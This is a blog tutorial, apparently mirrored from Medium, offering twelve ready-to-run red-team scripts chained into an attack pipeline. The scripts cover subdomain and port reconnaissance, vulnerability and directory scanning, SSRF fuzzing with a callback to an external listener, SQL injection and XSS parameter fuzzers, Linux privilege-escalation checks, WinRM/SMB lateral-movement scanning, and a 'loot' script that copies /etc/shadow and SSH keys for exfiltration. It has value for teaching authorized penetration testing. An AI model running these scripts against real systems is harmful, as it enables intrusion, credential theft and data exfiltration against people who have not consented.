Red Team Automation: 12 Scripts That Save Hours (and Win Real Engagements)

medium.com · Very Lazy Tech · 7 days ago · tutorial
quality 7/10 · good
0 net
Tags
bug-bounty
Red Team Automation: 12 Scripts That Save Hours (and Win Real Engagements) | by Very Lazy Tech 👾 - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Red Team Automation: 12 Scripts That Save Hours (and Win Real Engagements) Ever burned a whole weekend on manual recon, only to realize you missed a low-hanging RCE vector because you were sorting through logs by… Very Lazy Tech 👾 Follow ~8 min read · April 3, 2026 (Updated: April 3, 2026) · Free: No Ever burned a whole weekend on manual recon, only to realize you missed a low-hanging RCE vector because you were sorting through logs by hand? You're not alone. Over 60% of red teamers admit they waste precious hours on tasks a good script could finish before you even pour your coffee. Let's fix that — together. Welcome to the world of red team automation. I'm about to walk you through 12 real-life scripts that I (and countless pentesters) use to speed up recon, exploitation, and post-exploitation — leaving more time for creative attacks and, honestly, more sleep. Why Red Team Automation Matters (More Than Ever) Red teaming is more competitive than ever. Bug bounty programs drop new assets weekly. Clients want deeper coverage in less time. If you're still clicking through Burp Suite by hand, you're probably missing out — on both findings and fun. Here's the thing: the best red teamers aren't just manual testers; they're power-users of automation. They build, tweak, and deploy scripts for everything from OSINT to privilege escalation, making themselves practically unstoppable. What You'll Get Today 12 actionable scripts (with code you can use or adapt) Step-by-step usage for each—no guesswork Tips to integrate into your workflow, whether you're a lone wolf or leading a team Sound good? Let's roll. Automated Subdomain Enumeration with Subfinder & Amass If you're still running nslookup in a loop — stop. Subdomain enumeration is foundation work, and automation here saves hours. Script: Bash Wrapper for Subdomain Recon This little beauty chains Subfinder and Amass for you, merges results, and sorts out duplicates. Run it, walk away, come back to a fat list of targets. #!/bin/bash domain=$1 if [ -z "$domain" ]; then echo "Usage: $0 " exit 1 fi subfinder -d $domain -silent > subs1.txt amass enum -d $domain -o subs2.txt cat subs1.txt subs2.txt | sort -u > ${domain}_all_subs.txt rm subs1.txt subs2.txt echo "[*] Subdomain enumeration complete. Results in ${domain}_all_subs.txt" How to Use Save as subenum.sh , chmod +x subenum.sh Run ./subenum.sh example.com Drink your coffee while it runs Why It's Gold Kicks off two industry-standard tools at once Dedupes every result Scales to hundreds of domains if looped 2. Mass Port Scanning with Fast-Scan Nmap Manual Nmap scans are slow, especially on wide scopes. You need something snappy for initial sweeps. Script: Quick Nmap Top 1000 Port Scanner Here's a bash snippet that blitzes through your subdomain list. #!/bin/bash input=$1 if [ -z "$input" ]; then echo "Usage: $0 " exit 1 fi while read host; do echo "Scanning $host..." nmap -T4 -F -Pn $host | tee -a nmap_results.txt done < $input echo "Done! All results in nmap_results.txt" Hints -T4 speeds up scans -F checks top 100 ports (customize as needed) -Pn skips host discovery if ICMP is blocked Real-World Use I've handed off 200+ targets to this script during a live engagement — let it run overnight, then dig into the open ports with targeted scripts next morning. 3. Automated Screenshotting with Aquatone Ever spent hours checking which subdomains are visually interesting? You don't have to. Script: Aquatone Screenshot Collector #!/bin/bash subs=$1 if [ -z "$subs" ]; then echo "Usage: $0 " exit 1 fi cat $subs | aquatone -out aquatone_report echo "[*] Aquatone complete. Open aquatone_report/aquatone_report.html to browse screenshots." Why This Rocks Visual triage: spot juicy apps (admin panels, test portals) at a glance Great for reporting—drop screenshots right into your findings Pro Tip Combine this output with your Nmap results for targeted web attacks. 4. One-Liner for HTTP Probing: httprobe You've got 1000 subdomains, but which ones actually respond over HTTP/HTTPS? Don't check by hand. Script: Check HTTP/HTTPS Live Hosts cat ${domain}_all_subs.txt | httprobe > live_hosts.txt What's Happening Feeds your big list of subs to httprobe Dumps only live web hosts to live_hosts.txt Use Case Perfect before mass vulnerability scanning or XSS poking. 5. Mass Vulnerability Scanning with Nuclei Let's be honest — manual CVE checks are for masochists. nuclei automates thousands of vulnerability checks. Script: Nuclei Mass Scanner nuclei -l live_hosts.txt -t cves/ -o nuclei_results.txt Key Points -l points to your list of live hosts -t cves/ grabs all CVE templates (update as needed) Output is nice and clean for grep or manual review Real-World Impact I've seen zero-days pop up here — especially on large external pentests where you're fishing for low-effort, high-impact bugs. 6. Automated Directory Bruteforcing with Gobuster Directory brute-forcing by hand? Not in this decade. Script: Gobuster Loop Over Live Hosts #!/bin/bash hosts=$1 if [ -z "$hosts" ]; then echo "Usage: $0 " exit 1 fi wordlist="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" while read url; do echo "Scanning $url..." gobuster dir -u $url -w $wordlist -q -o gobuster_${url//[:\/]/_}.txt done < $hosts echo "Done. Check gobuster_* files for results." What's Different Here Handles weird domain/URL characters in filenames Runs quietly (`-q`) Easily parallelizable for big scopes 7. Automated SSRF Tester SSRF (Server-Side Request Forgery) is a goldmine but a pain to test at scale. Let's automate payload injection. Script: SSRF Fuzzer for URL Parameters #!/bin/bash target=$1 if [ -z "$target" ]; then echo "Usage: $0 " exit 1 fi attacker_server="http://your.burpcollaborator.net" params=$(echo $target | grep -oP '(?<=\?).*' | tr '&' '\n' | cut -d= -f1) for param in $params; do test_url=$(echo $target | sed "s/\($param=\)[^&]*/\1$attacker_server/") echo "Testing $param: $test_url" curl -sk $test_url & done wait echo "Check your Burp Collaborator or logging server for hits." How to Use Replace your.burpcollaborator.net with your external listener Script injects your callback into every query parameter Check your logs for SSRF triggers The Cool Part? This tactic scales — tweak for wordlists or larger target sets with minimal effort. 8. SQL Injection Fuzzer: Quickfire SQLi is still rampant, but fuzzing every param by hand is tedious. Script: Rapid SQLi Param Tester #!/bin/bash target=$1 if [ -z "$target" ]; then echo "Usage: $0 " exit 1 fi payload="' OR '1'='1" params=$(echo $target | grep -oP '(?<=\?).*' | tr '&' '\n' | cut -d= -f1) for param in $params; do test_url=$(echo $target | sed "s/\($param=\)[^&]*/\1$payload/") echo "Testing parameter $param" curl -sk $test_url | grep -i error && echo "[!] Possible SQLi on $param" done What It Does Rewrites each parameter with a classic payload Flags possible errors for quick triage In Practice… You'll still want to validate manually — but this script surfaces the "weird" ones for deeper investigation. 9. XSS Payload Automator Cross-site scripting is everywhere, but who wants to copy-paste payloads for each parameter? Script: XSS Param Blaster #!/bin/bash target=$1 if [ -z "$target" ]; then echo "Usage: $0 " exit 1 fi payload="" params=$(echo $target | grep -oP '(?<=\?).*' | tr '&' '\n' | cut -d= -f1) for param in $params; do test_url=$(echo $target | sed "s/\($param=\)[^&]*/\1$payload/") echo "Testing $param for XSS" curl -sk $test_url | grep "$payload" && echo "[*] XSS reflected on $param" done How to Use Works great for GET parameters Fires classic payload, checks if reflected Want More? Pair with Burp Repeater for deeper, manual tests — or expand your payload arsenal for tricky filters. 10. Mass Privilege Escalation Checker (Linux) You've got a shell. You want root. It's not always obvious what to try — unless you automate the boring checks. Script: Linux PrivEsc Fast Checker #!/bin/bash echo "[*] Checking for sudo privileges..." sudo -l echo "[*] Checking for writable /etc/passwd or /etc/shadow..." ls -l /etc/passwd /etc/shadow echo "[*] Looking for SUID binaries..." find / -perm -4000 -type f 2>/dev/null echo "[*] Searching for world-writable files..." find / -writable -type f 2>/dev/null echo "[*] Scanning for password files..." find / -name '*.bak' -or -name '*.old' -or -name '*.swp' 2>/dev/null echo "[*] Done. Review outputs for privilege escalation vectors." Why It Helps One-off all the classic privesc checks in seconds Helps surface misconfigurations or forgotten SUID binaries In Practice I've landed root access just by spotting a world-writable SUID file. This script makes sure you don't miss those easy wins. 11. Lateral Movement Finder (Windows) Once inside a network, you want to move laterally — quickly. Mapping trust relationships by hand is slow. Script: WinRM/SMB Lateral Movement Scanner (PowerShell) $hosts = Get-Content .\hosts.txt foreach ($host in $hosts) { Write-Output "Checking $host..." Test-WSMan $host -ErrorAction SilentlyContinue && Write-Output "$host has WinRM exposed." Test-NetConnection -ComputerName $host -Port 445 | Where-Object { $_.TcpTestSucceeded } | ForEach-Object { Write-Output "$host has SMB open." } } How It Works Reads a list of hosts (from bloodhound, nmap, whatever) Checks for WinRM (PowerShell Remoting) and SMB (classic lateral movement vectors) Real Talk You'll need the right creds to exploit these, but knowing where the doors are saves tons of time. 12. Exfiltration Script: Quick Data Grabber Once you pop a box, you want sensitive data — fast, before someone notices. Script: Fast /etc and SSH Data Collector (Linux) #!/bin/bash loot_dir="loot_$(hostname)_$(date +%s)" mkdir $loot_dir cp /etc/passwd $loot_dir/ cp /etc/shadow $loot_dir/ 2>/dev/null cp -R ~/.ssh $loot_dir/ 2>/dev/null tar czvf ${loot_dir}.tar.gz $loot_dir echo "[*] Data exfil complete. Grab ${loot_dir}.tar.gz" What It Snags Password hashes SSH keys (user context) Compresses everything for fast transfer How to Use Run after privilege escalation — or as your first step post-shell Transfer the archive, analyze offline Bonus: Chaining it All Together Here's where it gets interesting. You can chain these scripts into a full red team pipeline. Imagine: Subdomain enum feeds live host detection Live hosts go into Nmap, Aquatone, and Nuclei Vulnerable hosts get Gobuster, SSRF, SQLi, and XSS fuzzers Inside, privesc and exfil scripts make sure you don't leave loot behind It's not just about running tools — it's about combining them so you focus on the creative part of hacking, not the grind. Bringing It All Home Red team automation isn't just a nice-to-have. It's your secret weapon against time, boredom, and missed findings. Scripts like these don't make you less of a hacker — they set you free to hunt for the clever bugs, the privilege escalation chains, and the rare misconfigs that make a report shine. If you're serious about pentesting, bug bounty, or internal red team ops, start automating these boring (but essential) tasks today. Build your own library, share with teammates, and iterate. And hey, if you've got a killer script of your own that saved your skin, let's trade stories. The best red teams never stop learning — or automating. Keep hacking smarter. 🚀 Become a VeryLazyTech Member — Get Instant Access What you get today: ✅ 70GB Google Drive packed with cybersecurity content ✅ 3 full courses to level up fast 👉 Join the Membership → https://shop.verylazytech.com 📚 Need Specific Resources? ✅ Instantly download the best hacking guides, OSCP prep kits, cheat sheets, and scripts used by real security pros. 👉 Visit the Shop → https://shop.verylazytech.com 💬 Stay in the Loop Want quick tips, free tools, and sneak peeks? ✖ https://x.com/verylazytech/ | 👾 https://github.com/verylazytech/ | 📺 https://youtube.com/@verylazytech/ | 📩 https://t.me/+mSGyb008VL40MmVk/ | 🕵️‍♂️ https://www.verylazytech.com/ #penetration-testing #cybersecurity #hacking #cyber #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories